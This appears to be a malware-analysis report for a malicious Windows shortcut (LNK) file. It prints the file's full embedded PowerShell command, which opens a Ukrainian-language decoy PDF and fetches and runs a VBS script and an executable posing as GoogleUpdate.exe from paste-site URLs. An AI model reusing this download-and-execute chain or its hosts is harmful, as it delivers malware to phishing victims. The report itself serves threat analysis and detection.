Malicious

d624ea573893acfece46e82e4ce49998

LNK File | MD5: d624ea573893acfece46e82e4ce49998 | Size: 3.8 KB | application/x-ms-shortcut

Characteristics
Artefacts
Name: LNK: Command Execution
Value:

powershell.exe -Nop -sta -noni -w hidden C:\Windows\System32\curl.exe -o C:\Users\Public\Звернення.pdf https://sbufiles.cloud/sbu/instructions/orders/%D0%97%D0%B2%D0%B5%D1%80%D0%BD%D0%B5%D0%BD%D0%BD%D1%8F_%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D1%8C%D0%BD%D0%B8%D0%BA%D0%B0_%D0%A3%D0%A1%D0%91%D0%A3_%D0%BF%D0%BE_%D0%96%D0%B8%D1%82%D0%BE%D0%BC%D0%B8%D1%80%D1%81%D1%8C%D0%BA%D1%96%D0%B9_%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%96_%D0%9A%D0%BE%D0%BC%D0%BF%D0%B0%D0%BD%D1%87%D0%B5%D0%BA%D0%BE_%D0%92_%D0%92.pdf/?id=783040939090732 --ssl-no-revoke; Invoke-Item -Path C:\Users\Public\Звернення.pdf; C:\Windows\System32\curl.exe -o C:\Users\Public\Downloads\gupdate.vbs https://paste.c-net.org/PasadenaDeepest --ssl-no-revoke; Invoke-Item -Path C:\Users\Public\Downloads\gupdate.vbs; C:\Windows\System32\curl.exe -o C:\Users\Public\Downloads\GoogleUpdate.exe https://paste.c-net.org/LeatherBlending --ssl-no-revoke; Remove-Item -Path C:\Users\Public\Downloads\gupdate.vbs

d624ea573893acfece46e82e4ce49998 (3.8 KB)
No malware configuration was found at this point.